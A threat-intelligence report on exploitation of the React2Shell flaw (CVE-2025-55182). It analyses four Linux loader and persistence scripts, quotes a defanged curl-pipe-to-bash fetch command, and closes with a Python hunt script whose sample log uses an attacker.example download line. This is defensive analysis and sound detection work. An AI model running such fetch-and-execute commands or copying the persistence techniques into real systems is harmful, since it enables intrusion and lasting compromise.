React2Shell flaw (CVE-2025-55182) exploited for remote code execution
Figure 2: Examples of suspicious post-exploitation commands executed on Linux
The pattern of these commands is consistent: remote shell scripts or binaries are downloaded and executed, immediately followed by attempts to remove any trace of the attack. The detected payloads map to known Sophos detections for Linux loaders and agents. Analysis of the retrieved scripts revealed at least four key components, each responsible for a different stage of the attack.
The first script (gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh, detected by Linux/DldrYI) is a multi-stage malware installer that establishes persistent access on Linux systems. Upon execution, it downloads a legitimate Node.js binary to a hidden directory and then deploys two Base64-encoded payloads: an encrypted data file and heavily obfuscated JavaScript malware. The JavaScript component uses AES-256-CBC encryption to decrypt and execute additional payloads, spawns a detached background process to maintain persistence, and implements anti-forensic measures by deleting the original installer script.
The second script (tsd.sh, detected by Linux/AgntGB) implements persistence for a component named ‘tsd’ by creating entries under ‘/etc/cron.hourly/tsd’ and ‘/etc/cron.hourly/tsd.sh’, leveraging systemd where available. If neither systemd nor cron is effective, the script falls back to rc.local. The script ensures that tsd is always running, restarting it if the process is not present, so that the implant survives simple reboots or process kills.
The third script (init.sh, detected by Linux/AgntGC) is a sophisticated malware deployment tool that establishes persistent system compromise through multiple redundancy mechanisms. Upon execution, it downloads a malicious binary from an AWS S3 bucket (hybird-accesskey-staging-saas[.]s3[.]dualstack[.]ap-northeast-1[.]amazonaws[.]com/agent), installs it to /usr/infju/system_os, and establishes persistence through both systemd service installation and cron-based process management. The malware masquerades as a legitimate system service (system_os.service) with automatic restart capabilities. A separate cron job runs daily at midnight to forcibly restart the process, ensuring continued operation even if the service is manually stopped. The script includes operating system detection for CentOS and Ubuntu, attempts privilege escalation via sudo commands, and creates a process management script that logs all restart activities to /var/log/system_os_management.log. The use of legitimate system directories, systemd integration, and multi-layered persistence mechanisms suggests the script is a professionally developed malware dropper designed for long-term, resilient system compromise. This script includes many Chinese comments, indicating possible links to Chinese-speaking development teams or tooling reuse.
The fourth script (b.sh, detected by Linux/DldrYG) functions as another loader in the ecosystem and is fetched via ‘/bin/sh -c $(curl -sfL hxxp://194[.]38[.]11[.]3:1790/b.sh | bash | gzip -n | base64 -w0)’. Piping curl directly into bash, combined with compression and encoding of the output, suggests the threat actor intends to limit the creation of artifacts on disk and may be aiming to bypass simple content inspection. The attacker issues a series of curl and nslookup commands against Canarytokens-style domains to confirm the success of the exploit (see Figure 3).
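The following hunt logic, added here as an example and not part of the Sophos analysis, scans process-creation command lines for the two behaviours described above: curl output piped into a shell with the result gzip-compressed and base64-encoded, and references to the persistence locations named for tsd and system_os. The sample log lines are constructed, and attacker.example stands in for the real download host.

```python
import re

# Persistence locations and names taken from the write-up; a command line that
# touches any of them is worth a closer look.
PERSISTENCE_MARKERS = (
    "/etc/cron.hourly/tsd",              # matches both tsd and tsd.sh entries
    "/usr/infju/system_os",
    "system_os.service",
    "/var/log/system_os_management.log",
)

# curl output handed straight to sh/bash, optionally followed by gzip + base64
# of whatever the shell printed (the shape of the b.sh fetch command).
CURL_PIPE_SHELL = re.compile(r"curl\s+[^|]*\|\s*(?:ba)?sh\b", re.I)
COMPRESS_ENCODE = re.compile(r"\|\s*gzip\b.*\|\s*base64\b", re.I)


def classify_command(cmdline):
    """Return a list of detection tags for one command line (empty if clean)."""
    tags = []
    if CURL_PIPE_SHELL.search(cmdline):
        tags.append("curl_pipe_shell")
        if COMPRESS_ENCODE.search(cmdline):
            tags.append("compressed_encoded_output")
    for marker in PERSISTENCE_MARKERS:
        if marker in cmdline:
            tags.append("persistence_marker:" + marker)
    return tags


def hunt(log_lines):
    """Return (command line, tags) pairs for every line that raised a tag."""
    return [(line, classify_command(line)) for line in log_lines
            if classify_command(line)]


# Constructed telemetry: one loader fetch, two persistence writes, two benign lines.
SAMPLE_LOG = [
    "/bin/sh -c $(curl -sfL http://attacker.example/b.sh | bash | gzip -n | base64 -w0)",
    "curl -sfL https://deb.nodesource.com/setup_20.x -o setup.sh",
    "cp /tmp/tsd.sh /etc/cron.hourly/tsd.sh && chmod +x /etc/cron.hourly/tsd.sh",
    "systemctl enable --now system_os.service",
    "ls -la /home",
]

if __name__ == "__main__":
    for line, tags in hunt(SAMPLE_LOG):
        print(", ".join(tags), "<-", line)
```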
